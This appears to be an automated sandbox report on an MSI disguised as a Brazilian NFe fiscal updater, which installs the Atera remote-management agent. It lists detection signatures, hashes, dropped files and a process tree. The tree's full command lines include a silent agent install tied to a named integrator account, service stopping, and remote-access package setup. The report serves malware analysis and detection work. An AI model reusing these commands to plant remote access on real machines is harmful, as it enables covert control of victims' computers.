Edit tour

Windows Analysis Report
Atualizador_Fiscal_NFe_37882912.msi

Overview

General Information

Sample name:	Atualizador_Fiscal_NFe_37882912.msi
Analysis ID:	1573179
MD5:	944d3812653ef7cf2708e7366ab11f17
SHA1:	5b6581dfa7611eabad65a5dc4c0db77e264260d4
SHA256:	c1c2d1eb19c0daba80bceb2652e5f7057395acb7001036f354f2438dece3e6fb
Tags:	msiuser-Porcupine
Infos:

Detection

AteraAgent

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Yara detected AteraAgent

AI detected suspicious sample

Creates files in the system32 config directory

Installs Task Scheduler Managed Wrapper

Queries disk data (e.g. SMART data)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive service information (via WMI, MSSMBios_RawSMBiosTables, often done to detect sandboxes)

Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)

Reads the Security eventlog

Reads the System eventlog

Yara detected Generic Downloader

Adds / modifies Windows certificates

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for available system drives (often done to infect USB drives)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates or modifies windows services

Deletes files inside the Windows folder

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops certificate files (DER)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Is looking for software installed on the system

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the product ID of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores large binary data to the registry

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses net.exe to stop services

Uses taskkill to terminate processes

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

msiexec.exe (PID: 3720 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Atualizador_Fiscal_NFe_37882912.msi" MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 5576 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 5040 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 6CA4322E5D5FFDAF9B5BE54CEFF6E8EF MD5: 9D09DC1EDA745A5F87553048E57620CF)

rundll32.exe (PID: 344 cmdline: rundll32.exe "C:\Windows\Installer\MSIA89C.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5744953 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 3320 cmdline: rundll32.exe "C:\Windows\Installer\MSIAB6C.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5746140 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 5064 cmdline: rundll32.exe "C:\Windows\Installer\MSIC6C5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5752546 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 7320 cmdline: rundll32.exe "C:\Windows\Installer\MSIE7A0.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5760953 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd MD5: 889B99C52A60DD49227C5E485A016679)

msiexec.exe (PID: 6744 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 6D26F14034A16EC2E7A017FE2C233455 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)

net.exe (PID: 2640 cmdline: "NET" STOP AteraAgent MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 6656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 6940 cmdline: C:\Windows\system32\net1 STOP AteraAgent MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

taskkill.exe (PID: 1612 cmdline: "TaskKill.exe" /f /im AteraAgent.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AteraAgent.exe (PID: 2588 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="contato@filosofiaclinicachapeco.com.br" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000Of2eLIAR" /AgentId="dfb304ca-1bde-49cc-a755-fa31deeb53c5" MD5: 477293F80461713D51A98A24023D45E8)

msiexec.exe (PID: 7460 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding DCE17E5D50B32609D0AF214981432641 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)

rundll32.exe (PID: 7576 cmdline: rundll32.exe "C:\Windows\Installer\MSIEE25.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5828390 37 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 2992 cmdline: rundll32.exe "C:\Windows\Installer\MSIF48E.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5829796 41 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart MD5: 889B99C52A60DD49227C5E485A016679)

AteraAgent.exe (PID: 5768 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" MD5: 477293F80461713D51A98A24023D45E8)

sc.exe (PID: 7248 cmdline: "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AgentPackageAgentInformation.exe (PID: 7664 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "e2aff9ec-0443-4e2e-911d-1a87ff7f14f5" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Of2eLIAR MD5: 83FD950ED584099A4125EFBA77E26BAA)

conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AgentPackageAgentInformation.exe (PID: 7788 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "63f96359-1827-4d06-be75-18d92a7c1d16" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000Of2eLIAR MD5: 83FD950ED584099A4125EFBA77E26BAA)

conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AgentPackageAgentInformation.exe (PID: 8004 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "d2b7b5a8-ee48-431a-b16e-4e13c856aa4f" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000Of2eLIAR MD5: 83FD950ED584099A4125EFBA77E26BAA)

conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 8156 cmdline: "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cscript.exe (PID: 7268 cmdline: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)

AgentPackageSTRemote.exe (PID: 1524 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "b0110d28-0ca9-4cdd-bf48-816b1c3482b4" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIiwiUmVxdWVzdFBlcm1pc3Npb25PcHRpb24iOm51bGwsIlJlcXVpcmVQYXNzd29yZE9wdGlvbiI6bnVsbCwiUGFzc3dvcmQiOm51bGx9" 001Q300000Of2eLIAR MD5: 67FEF41237025021CD4F792E8C24E95A)

conhost.exe (PID: 1136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AgentPackageMonitoring.exe (PID: 7556 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "e532489e-e47a-4c00-92df-b85ef3f9c47f" agent-api.atera.com/Production 443 or8ixLi90Mf "syncprofile" 001Q300000Of2eLIAR MD5: 5E3252E0248B484E76FCDBF8B42A645D)

conhost.exe (PID: 7520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AteraAgent.exe (PID: 7836 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" MD5: 477293F80461713D51A98A24023D45E8)

sc.exe (PID: 7928 cmdline: "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AgentPackageMonitoring.exe (PID: 2128 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "e532489e-e47a-4c00-92df-b85ef3f9c47f" agent-api.atera.com/Production 443 or8ixLi90Mf "syncprofile" 001Q300000Of2eLIAR MD5: 5E3252E0248B484E76FCDBF8B42A645D)

conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AgentPackageAgentInformation.exe (PID: 7128 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "b7913a8a-f9c6-44d6-b153-cbae5eab311c" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo" 001Q300000Of2eLIAR MD5: 83FD950ED584099A4125EFBA77E26BAA)

conhost.exe (PID: 3396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4336 cmdline: "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cscript.exe (PID: 3520 cmdline: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)

AgentPackageUpgradeAgent.exe (PID: 7756 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "f40b3a64-d934-4445-96c6-2f766d5210eb" agent-api.atera.com/Production 443 or8ixLi90Mf "checkforupdates" 001Q300000Of2eLIAR MD5: E9794F785780945D2DDE78520B9BB59F)

conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 7272 cmdline: "msiexec.exe" /i C:\Windows\TEMP\ateraAgentSetup64_1_8_7_2.msi /lv* AteraSetupLog.txt /qn /norestart MD5: E5DA170027542E25EDE42FC54C929077)

AgentPackageTicketing.exe (PID: 2848 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "7e966fca-5db5-4899-b235-235f60debc02" agent-api.atera.com/Production 443 or8ixLi90Mf "maintain" 001Q300000Of2eLIAR MD5: DB1DB66EBD9B15B7DCD55374EA56EE5E)

conhost.exe (PID: 1052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AgentPackageMonitoring.exe (PID: 2252 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "f80e7fd7-093a-49ee-afe3-91d4df20447b" agent-api.atera.com/Production 443 or8ixLi90Mf "monitor" 001Q300000Of2eLIAR MD5: 5E3252E0248B484E76FCDBF8B42A645D)

conhost.exe (PID: 5888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AgentPackageProgramManagement.exe (PID: 3664 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "31ce45eb-a81e-4a65-8c03-ab37bcf781fe" agent-api.atera.com/Production 443 or8ixLi90Mf "syncinstalledapps" 001Q300000Of2eLIAR MD5: 0F33A7ACB33960D1306BA418405D8264)

conhost.exe (PID: 2472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AgentPackageHeartbeat.exe (PID: 1984 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe" dfb304ca-1bde-49cc-a755-fa31deeb53c5 "5070f66e-f4af-405a-83ec-4c6f4d61e8fc" agent-api.atera.com/Production 443 or8ixLi90Mf "heartbeat" 001Q300000Of2eLIAR MD5: 797C9554EC56FD72EBB3F6F6BEF67FB5)

conhost.exe (PID: 504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sppsvc.exe (PID: 6940 cmdline: C:\Windows\system32\sppsvc.exe MD5: 320823F03672CEB82CC3A169989ABD12)

svchost.exe (PID: 7456 cmdline: C:\Windows\System32\svchost.exe -k smphost MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

AgentPackageUpgradeAgent.exe (PID: 7956 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" schedulerrun MD5: E9794F785780945D2DDE78520B9BB59F)

conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author
\Device\ConDrv	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.Utils.dll	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Windows\Temp\~DF3F79CFC1DC95853D.TMP	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Temp\~DFB365D0C004639C0B.TMP	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.CommonLib.dll	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackage.Common.dll	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Temp\~DF9DAEB42AA8FFCAB8.TMP	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Temp\~DF780BCEC102FED09B.TMP	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Config.Msi\57a755.rbs	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.ModelsV3.dll	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.ModelsV3.dll	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\UserDetections.dll	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\choco-logs\12-11-2024 10_13_27-log.txt	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Temp\AteraSetupLog.txt	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Temp\~DF39F7B078501F4296.TMP	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Installer\MSI2247.tmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Installer\MSI2247.tmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.ModelsV3.dll	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Temp\~DF02DC3C0CC880FEF6.TMP	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Temp\~DF39CB4E03F3FCB28C.TMP	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Config.Msi\57a762.rbs	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dll	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Installer\MSIC6C5.tmp-\AlphaControlAgentInstallation.dll	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Installer\MSIC6C5.tmp-\AlphaControlAgentInstallation.dll	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Temp\~DF7688D5E64E43D8F6.TMP	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Temp\~DF7688D5E64E43D8F6.TMP	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.Utils.dll	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.Utils.dll	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exe	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Temp\~DFE2EC260D0FB6D90A.TMP	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Temp\~DFE2EC260D0FB6D90A.TMP	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Temp\~DFE97790A727CB1E4E.TMP	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Temp\~DFA2543C02866615B8.TMP	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Temp\~DF5016C29A7A75E6D0.TMP	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\logs\choco.summary.log	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Temp\~DF3491A3C7A4B2661D.TMP	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Temp\~DF3491A3C7A4B2661D.TMP	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Installer\MSIEE25.tmp-\AlphaControlAgentInstallation.dll	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Installer\MSIF48E.tmp-\AlphaControlAgentInstallation.dll	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\logs\chocolatey.log	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Installer\MSIA89C.tmp-\AlphaControlAgentInstallation.dll	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Installer\MSIE7A0.tmp-\AlphaControlAgentInstallation.dll	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Temp\~DF87F5534CBA186A27.TMP	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Installer\MSI39FA.tmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Installer\MSI39FA.tmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Temp\~DF15D198E16D3D18AB.TMP	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Config.Msi\57a75a.rbs	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Config.Msi\57a75a.rbs	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Config.Msi\57a75a.rbs	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminder.exe	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\netstandard.dll	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\choco-logs\12-11-2024 10_13_28-log.txt	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.InstallLog	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Temp\~DF8B61ED29D3624AAC.TMP	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Installer\inprogressinstallinfo.ipi	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Installer\MSIAB6C.tmp-\AlphaControlAgentInstallation.dll	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Installer\MSIAB6C.tmp-\AlphaControlAgentInstallation.dll	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Installer\MSIC8BA.tmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\Temp\~DFADA93DBF4BCB97E3.TMP	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\System32\InstallUtil.InstallLog	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Windows\System32\InstallUtil.InstallLog	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.exe	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
